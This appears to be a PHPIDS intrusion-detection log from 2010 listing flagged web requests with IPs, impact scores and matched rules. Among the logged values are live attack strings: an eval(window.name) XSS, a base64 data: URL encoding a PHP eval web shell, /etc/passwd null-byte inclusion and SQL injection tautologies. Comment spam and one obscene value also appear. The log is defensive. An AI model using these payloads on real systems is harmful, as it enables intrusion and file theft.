| ID: | 123118 | | Name: | GET.test | | Value: | "><script>eval(window.name)</script> | | Page: | /i.php?test=%22%3e%3cscript%3eeval(window.name)%3c/script%3e | | IP: | 67.195.111.36 | | Impact: | 72 | | Created: | 2010-04-30 21:43:11 | | Details: | Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: Detects url-, name-, JSON, and referrer-contained payload attacks | Tags: xss, csrf | ID: 4 Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16 Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17 Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123113 | | Name: | REQUEST.PREF | | Value: | ID=f04db74a53951081:TM=1272687615:LM=1272687615:S=mMjEtv4FpHxlTMtl | | Page: | /i.php?page=videos/recovercookies | | IP: | 155.246.12.164 | | Impact: | 30 | | Created: | 2010-04-30 21:18:33 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27
|
| ID: | 123114 | | Name: | REQUEST.domain | | Value: | .google.com, NID=34=qCpL-sT3NYfpft2SfdyBXO08MXB9t1nlXQ5OCtu429nYpCbKZI-NLQikiPE5QG3ejeAs2a1QjUKflwdjHwHJ66CA4KtL1xcPPbp-VqUGpS0zh_1m6IqudIuD0GrbPWb9 | | Page: | /i.php?page=videos/recovercookies | | IP: | 155.246.12.164 | | Impact: | 30 | | Created: | 2010-04-30 21:18:33 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 123115 | | Name: | COOKIE.PREF | | Value: | ID=f04db74a53951081:TM=1272687615:LM=1272687615:S=mMjEtv4FpHxlTMtl | | Page: | /i.php?page=videos/recovercookies | | IP: | 155.246.12.164 | | Impact: | 30 | | Created: | 2010-04-30 21:18:33 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27
|
| ID: | 123116 | | Name: | COOKIE.domain | | Value: | .google.com, NID=34=qCpL-sT3NYfpft2SfdyBXO08MXB9t1nlXQ5OCtu429nYpCbKZI-NLQikiPE5QG3ejeAs2a1QjUKflwdjHwHJ66CA4KtL1xcPPbp-VqUGpS0zh_1m6IqudIuD0GrbPWb9 | | Page: | /i.php?page=videos/recovercookies | | IP: | 155.246.12.164 | | Impact: | 30 | | Created: | 2010-04-30 21:18:33 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 123111 | | Name: | REQUEST.codeme | | Value: | Hi, <a href= http://whatisthedifferencebetw.imagekind.com/#1 >what is the difference between ativan and xanax information</a> [url=http://whatisthedifferencebetw.imagekind.com/#1]what is the difference between ativan and xanax information[/url], ajfu, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-30 20:55:57 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123112 | | Name: | POST.codeme | | Value: | Hi, <a href= http://whatisthedifferencebetw.imagekind.com/#1 >what is the difference between ativan and xanax information</a> [url=http://whatisthedifferencebetw.imagekind.com/#1]what is the difference between ativan and xanax information[/url], ajfu, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-30 20:55:57 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123109 | | Name: | REQUEST.codeme | | Value: | <script>alert("test")</script> | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 62.57.16.99 | | Impact: | 52 | | Created: | 2010-04-30 20:15:53 | | Details: | Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16 Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
|
| ID: | 123110 | | Name: | POST.codeme | | Value: | <script>alert("test")</script> | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 62.57.16.99 | | Impact: | 52 | | Created: | 2010-04-30 20:15:53 | | Details: | Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16 Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
|
| ID: | 123107 | | Name: | REQUEST.page | | Value: | data:;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbY21kXSk7ID8+ | | Page: | /i.php?page=data:;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbY21kXSk7ID8%2b&cmd=phpinfo() | | IP: | 67.195.111.36 | | Impact: | 88 | | Created: | 2010-04-30 18:22:28 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8 Description: Detects possible includes and packed functions | Tags: xss, csrf, id, rfe | ID: 14 Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27 Description: Detects code injection attempts 1/3 | Tags: id, rfe, lfi | ID: 58 Description: Detects code injection attempts 2/3 | Tags: id, rfe, lfi | ID: 59 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.1818181818182 Converted: ((((+::
|
| ID: | 123108 | | Name: | GET.page | | Value: | data:;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbY21kXSk7ID8+ | | Page: | /i.php?page=data:;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbY21kXSk7ID8%2b&cmd=phpinfo() | | IP: | 67.195.111.36 | | Impact: | 88 | | Created: | 2010-04-30 18:22:28 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8 Description: Detects possible includes and packed functions | Tags: xss, csrf, id, rfe | ID: 14 Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27 Description: Detects code injection attempts 1/3 | Tags: id, rfe, lfi | ID: 58 Description: Detects code injection attempts 2/3 | Tags: id, rfe, lfi | ID: 59 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.1818181818182 Converted: ((((+::
|
| ID: | 123106 | | Name: | GET.page | | Value: | security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker | | Page: | /i.php?page=security/thumbscrew-software-%3Cspan%20style=%27background-color:yellow%27%3Eusb%3C/span%3E-write-blocker | | IP: | 216.129.119.14 | | Impact: | 42 | | Created: | 2010-04-30 16:44:13 | | Details: | Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123105 | | Name: | REQUEST.page | | Value: | security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker | | Page: | /i.php?page=security/thumbscrew-software-%3Cspan%20style=%27background-color:yellow%27%3Eusb%3C/span%3E-write-blocker | | IP: | 216.129.119.14 | | Impact: | 42 | | Created: | 2010-04-30 16:44:12 | | Details: | Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123103 | | Name: | REQUEST.codeme | | Value: | I like it so much, <a href= http://famousadvertisingslogans.imagekind.com/#1 >famous advertising slogans</a> [url=http://famousadvertisingslogans.imagekind.com/#1]famous advertising slogans[/url], :), | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-30 15:04:50 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123104 | | Name: | POST.codeme | | Value: | I like it so much, <a href= http://famousadvertisingslogans.imagekind.com/#1 >famous advertising slogans</a> [url=http://famousadvertisingslogans.imagekind.com/#1]famous advertising slogans[/url], :), | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-30 15:04:50 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123101 | | Name: | REQUEST.codeme | | Value: | Your Site Is Great, <a href= http://freeunlistedphonenumberse.imagekind.com/ >free unlisted phone number search</a>, [url= http://freeunlistedphonenumberse.imagekind.com/ ]free unlisted phone number search[/url], kffb, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-04-30 13:48:33 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 123102 | | Name: | POST.codeme | | Value: | Your Site Is Great, <a href= http://freeunlistedphonenumberse.imagekind.com/ >free unlisted phone number search</a>, [url= http://freeunlistedphonenumberse.imagekind.com/ ]free unlisted phone number search[/url], kffb, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-04-30 13:48:33 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 123099 | | Name: | REQUEST.page | | Value: | backtrack-3-man/dsniff/usr/local/lib/dsniff.magic | | Page: | /i.php?page=backtrack-3-man/dsniff/usr/local/lib/dsniff.magic | | IP: | 67.195.111.36 | | Impact: | 10 | | Created: | 2010-04-30 12:12:52 | | Details: | Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
|
| ID: | 123100 | | Name: | GET.page | | Value: | backtrack-3-man/dsniff/usr/local/lib/dsniff.magic | | Page: | /i.php?page=backtrack-3-man/dsniff/usr/local/lib/dsniff.magic | | IP: | 67.195.111.36 | | Impact: | 10 | | Created: | 2010-04-30 12:12:52 | | Details: | Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
|
| ID: | 123097 | | Name: | REQUEST.page | | Value: | /etc/passwd | | Page: | /i.php?page=/etc/passwd%00 | | IP: | 67.195.111.36 | | Impact: | 20 | | Created: | 2010-04-30 09:46:19 | | Details: | Description: Detects etc/passwd inclusion attempts | Tags: dt, id, lfi | ID: 12 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123098 | | Name: | GET.page | | Value: | /etc/passwd | | Page: | /i.php?page=/etc/passwd%00 | | IP: | 67.195.111.36 | | Impact: | 20 | | Created: | 2010-04-30 09:46:19 | | Details: | Description: Detects etc/passwd inclusion attempts | Tags: dt, id, lfi | ID: 12 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123095 | | Name: | REQUEST.codeme | | Value: | What?, <a href= http://freehondaatvservicemanual.imagekind.com/#1 >All about free honda atv service manuals online</a> [url=http://freehondaatvservicemanual.imagekind.com/#1]All about free honda atv service manuals online[/url], rlt, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 36 | | Created: | 2010-04-30 09:34:16 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123096 | | Name: | POST.codeme | | Value: | What?, <a href= http://freehondaatvservicemanual.imagekind.com/#1 >All about free honda atv service manuals online</a> [url=http://freehondaatvservicemanual.imagekind.com/#1]All about free honda atv service manuals online[/url], rlt, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 36 | | Created: | 2010-04-30 09:34:16 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123093 | | Name: | REQUEST.codeme | | Value: | Is it so important?, http://chaseonlinebillpaying.imagekind.com/ chase online bill paying, nbo, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 10 | | Created: | 2010-04-30 08:43:54 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
|
| ID: | 123094 | | Name: | POST.codeme | | Value: | Is it so important?, http://chaseonlinebillpaying.imagekind.com/ chase online bill paying, nbo, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 10 | | Created: | 2010-04-30 08:43:54 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
|
| ID: | 123091 | | Name: | REQUEST.page | | Value: | suckmydick.php security/hackingillustrated | | Page: | /i.php?page=suckmydick.php%00security/hackingillustrated | | IP: | 198.145.242.125 | | Impact: | 10 | | Created: | 2010-04-30 07:56:12 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123092 | | Name: | GET.page | | Value: | suckmydick.php security/hackingillustrated | | Page: | /i.php?page=suckmydick.php%00security/hackingillustrated | | IP: | 198.145.242.125 | | Impact: | 10 | | Created: | 2010-04-30 07:56:12 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123089 | | Name: | REQUEST.codeme | | Value: | Good Job, <a href= http://playmonopolyonline.imagekind.com/#1 >play monopoly online free</a> [url=http://playmonopolyonline.imagekind.com/#1]play monopoly online free[/url], 8OO, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-30 07:52:11 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123090 | | Name: | POST.codeme | | Value: | Good Job, <a href= http://playmonopolyonline.imagekind.com/#1 >play monopoly online free</a> [url=http://playmonopolyonline.imagekind.com/#1]play monopoly online free[/url], 8OO, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-30 07:52:11 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123087 | | Name: | REQUEST.codeme | | Value: | What is it, <a href= http://homemadechristmasgiftidea.imagekind.com/ >Real homemade christmas gift ideas</a>, [url= http://homemadechristmasgiftidea.imagekind.com/ ]Real homemade christmas gift ideas[/url], arl, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-04-30 06:55:13 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 123088 | | Name: | POST.codeme | | Value: | What is it, <a href= http://homemadechristmasgiftidea.imagekind.com/ >Real homemade christmas gift ideas</a>, [url= http://homemadechristmasgiftidea.imagekind.com/ ]Real homemade christmas gift ideas[/url], arl, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-04-30 06:55:13 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 123085 | | Name: | REQUEST.BCSI-AC-4E050338BC5CF7E7 | | Value: | 1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA= | | Page: | / | | IP: | 170.167.4.200 | | Impact: | 22 | | Created: | 2010-04-30 06:46:57 | | Details: | Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.0769230769231 Converted: ((++:
|
| ID: | 123086 | | Name: | COOKIE.BCSI-AC-4E050338BC5CF7E7 | | Value: | 1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA= | | Page: | / | | IP: | 170.167.4.200 | | Impact: | 22 | | Created: | 2010-04-30 06:46:57 | | Details: | Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.0769230769231 Converted: ((++:
|
| ID: | 123083 | | Name: | REQUEST.uname | | Value: | '--; | | Page: | /?uname=%27--%3b | | IP: | 67.195.111.36 | | Impact: | 18 | | Created: | 2010-04-30 06:46:53 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects MySQL comments, conditions and ch(a)r injections | Tags: sqli, id, lfi | ID: 40
|
| ID: | 123084 | | Name: | GET.uname | | Value: | '--; | | Page: | /?uname=%27--%3b | | IP: | 67.195.111.36 | | Impact: | 18 | | Created: | 2010-04-30 06:46:53 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects MySQL comments, conditions and ch(a)r injections | Tags: sqli, id, lfi | ID: 40
|
| ID: | 123081 | | Name: | REQUEST.codeme | | Value: | It is a very good thing, <a href= http://lastminutevalentinegifts.imagekind.com/ >Discount last minute valentine gifts</a>, [url= http://lastminutevalentinegifts.imagekind.com/ ]Discount last minute valentine gifts[/url], 1866, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-04-30 04:11:27 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 123082 | | Name: | POST.codeme | | Value: | It is a very good thing, <a href= http://lastminutevalentinegifts.imagekind.com/ >Discount last minute valentine gifts</a>, [url= http://lastminutevalentinegifts.imagekind.com/ ]Discount last minute valentine gifts[/url], 1866, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-04-30 04:11:27 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 123079 | | Name: | REQUEST.codeme | | Value: | It is a very good thing, <a href= http://buyminimuffinpans.imagekind.com/#1 >buy mini muffin pans</a> [url=http://buyminimuffinpans.imagekind.com/#1]buy mini muffin pans[/url], pmbg, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-30 03:21:17 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123080 | | Name: | POST.codeme | | Value: | It is a very good thing, <a href= http://buyminimuffinpans.imagekind.com/#1 >buy mini muffin pans</a> [url=http://buyminimuffinpans.imagekind.com/#1]buy mini muffin pans[/url], pmbg, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-30 03:21:17 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123077 | | Name: | REQUEST.id | | Value: | ' | | Page: | /newscat.php?id=' | | IP: | 121.88.4.141 | | Impact: | 12 | | Created: | 2010-04-30 02:44:21 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
|
| ID: | 123078 | | Name: | GET.id | | Value: | ' | | Page: | /newscat.php?id=' | | IP: | 121.88.4.141 | | Impact: | 12 | | Created: | 2010-04-30 02:44:21 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
|
| ID: | 123075 | | Name: | REQUEST.id | | Value: | ' | | Page: | /newscat.php?id=' | | IP: | 121.88.4.141 | | Impact: | 12 | | Created: | 2010-04-30 02:44:08 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
|
| ID: | 123076 | | Name: | GET.id | | Value: | ' | | Page: | /newscat.php?id=' | | IP: | 121.88.4.141 | | Impact: | 12 | | Created: | 2010-04-30 02:44:08 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
|
| ID: | 123073 | | Name: | REQUEST.id | | Value: | ' | | Page: | /newscat.php?id=' | | IP: | 121.88.4.141 | | Impact: | 12 | | Created: | 2010-04-30 02:43:55 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
|
| ID: | 123074 | | Name: | GET.id | | Value: | ' | | Page: | /newscat.php?id=' | | IP: | 121.88.4.141 | | Impact: | 12 | | Created: | 2010-04-30 02:43:55 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
|
| ID: | 123071 | | Name: | REQUEST.codeme | | Value: | Excellent site. It was pleasant to me., <a href= http://buypitteddates.imagekind.com/#1 >buy pitted dates information</a> [url=http://buypitteddates.imagekind.com/#1]buy pitted dates information[/url], 63359, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-30 02:30:44 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123072 | | Name: | POST.codeme | | Value: | Excellent site. It was pleasant to me., <a href= http://buypitteddates.imagekind.com/#1 >buy pitted dates information</a> [url=http://buypitteddates.imagekind.com/#1]buy pitted dates information[/url], 63359, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-30 02:30:44 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123069 | | Name: | REQUEST.codeme | | Value: | Great, <a href= http://buyfreshbluecheese.imagekind.com/#1 >buy fresh blue cheese</a> [url=http://buyfreshbluecheese.imagekind.com/#1]buy fresh blue cheese[/url], 8-(((, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 40 | | Created: | 2010-04-30 01:40:29 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: --- Ratio: --- Converted: (((+::
|
| ID: | 123070 | | Name: | POST.codeme | | Value: | Great, <a href= http://buyfreshbluecheese.imagekind.com/#1 >buy fresh blue cheese</a> [url=http://buyfreshbluecheese.imagekind.com/#1]buy fresh blue cheese[/url], 8-(((, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 40 | | Created: | 2010-04-30 01:40:29 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: --- Ratio: --- Converted: (((+::
|
| ID: | 123067 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated'/**/XoR/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 66 | | Created: | 2010-04-30 01:34:04 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123068 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated'/**/XoR/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%278 | | IP: | 110.230.228.252 | | Impact: | 66 | | Created: | 2010-04-30 01:34:04 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
